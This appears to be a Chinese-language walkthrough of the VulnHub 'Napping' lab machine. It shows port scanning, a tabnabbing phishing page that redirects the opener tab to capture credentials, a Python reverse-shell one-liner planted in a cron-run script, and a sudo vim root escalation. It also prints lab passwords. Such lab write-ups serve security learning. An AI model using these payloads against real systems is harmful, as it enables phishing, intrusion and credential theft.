打靶记录(一四八)之VulnHubNapping1.0.1

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:06 CST
Nmap scan report for 192.168.56.132
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.29 seconds

┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:08 CST
Nmap scan report for 192.168.56.132
Host is up (0.0015s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.57 seconds

Tabnabbing

一个登录界面，测试了sql注入和XSS之后无果。通过注册界面注册一个账号登录。可以输入一个url,并且显示管理员会访问这个url，点击submit之后会插入url到html中

<p>Thank you for your submission, you have entered: <a href='http://baidu.com' target='_blank' >Here</a></p> 

发现有一个属性是_blank，存在Tabnabbing攻击

• Tabnabbing攻击：
  它利用浏览器的特性，即当用户在新标签页中打开链接时，浏览器允许新标签页中的JavaScript代码与原始标签页进行交互。攻击者可以利用这一点来诱骗用户点击链接，从而打开一个看似无害的新标签页，但实际上这个新标签页可以操纵或替换原始标签页的内容

现在本地80端口开启一个web服务器用于传输

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

然后写一个用于钓鱼的phish.html在这个目录

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.56.131:8000/');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.56.131:8000/');
    </script>
</body>
</html>

当用于访问这个phish.html时，由于设置了_blank，会在新的选项栏打开phish.html,但是老的界面会被更改成location.replace后的url,那么在用户没有发觉的情况下可以实现钓鱼

开启nc监听信息

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ nc -lvnp 8000
listening on [any] 8000 ...

过一会儿后(如果没有就多submit几次),web服务器收到对phish.html的请求

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.132 - - [15/Sep/2024 23:28:03] "GET /phish.html HTTP/1.1" 200 -

8000端口收到一则消息:

┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.56.131] from (UNKNOWN) [192.168.56.132] 41724
POST / HTTP/1.1
Host: 192.168.56.131:8000
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123 

url解码一下:daniel:C@ughtm3napping123

可用于ssh登录

横向移动

config.php

<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');
 
/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>

连接数据库发现无其他内容

adrian家目录有一个query.py

from datetime import datetime
import requests

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

并且还有一个site_status.txt

Site is Up: 14/09/2024 01:54:01
Site is Up: 14/09/2024 01:56:01
Site is Up: 15/09/2024 13:06:01
Site is Up: 15/09/2024 13:08:01
Site is Up: 15/09/2024 13:10:01
Site is Up: 15/09/2024 13:12:02
Site is Up: 15/09/2024 13:14:01
Site is Up: 15/09/2024 13:16:02
Site is Up: 15/09/2024 13:18:01
Site is Up: 15/09/2024 13:20:01

说明这个py脚本两分钟执行一次，并且当前的daniel有权限更改，改成一个反弹shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.131",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

提权

这个用户能以root权限执行vim

adrian@napping:/opt$ sudo -l
sudo -l
Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim

用vim执行一个sh,提权成功

adrian@napping:~$ sudo vim -c ':!/bin/sh'
sudo vim -c ':!/bin/sh'

BeyondROOT

这个机器是如何实现模拟钓鱼的呢

welcome.php会将submit的url存放在数据库中的links表中

<?php
<SNIP>
$mysqli = new mysqli("localhost", "adrian", "P@sswr0d456", "website");
// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}

if(isset($_POST['submit'])){ //check if form was submitted
  $input = $mysqli->real_escape_string($_POST['url']);
  $sql = "INSERT INTO links (link) VALUES ('$input')";
  if($mysqli->query($sql) === true){
    $message = "Thank you for your submission, you have entered: <a href='$input' target='_blank' >Here</a>";
  } else{
    $message = "It is totally free!";
  }
}else{                                                                                                                                                                                                                                       
  $message = "It is totally free!";                                                                                                                                                                                                     <SNIP>

在root家目录的napping.py，会定时执行，模拟将凭据发送至’location.replace’或’opener.location’的url

import requests
import re
import mysql.connector

mydb = mysql.connector.connect(
  host="localhost",
  user="adrian",
  password="P@sswr0d456",
  database="website"
)

mycursor = mydb.cursor()

mycursor.execute("SELECT * FROM links")

myresult = mycursor.fetchall()

data = {
        "username":"daniel",
        "password":"C@ughtm3napping123"
        }

for x in myresult:
  url1 = x[0]

  try:
    r1 = requests.get(url1,timeout=2)
    search = r1.text
    if (search.find('location.replace') != -1):
        match = re.findall("http(.*)\);",search)
        new_url = 'http' + match[0].rstrip(match[0][-1])
        r2 = requests.post(new_url,data=data,timeout=2)

    elif (search.find('opener.location') != -1):
        match = re.findall("http(.*);",search)
        new_url = 'http' + match[0].rstrip(match[0][-1])
        r2 = requests.post(new_url,data=data,timeout=2)
 
  except requests.exceptions.ReadTimeout:
    continue

碎碎念

没了解过Tabnabbing卡了很久，后面的内容都比较常规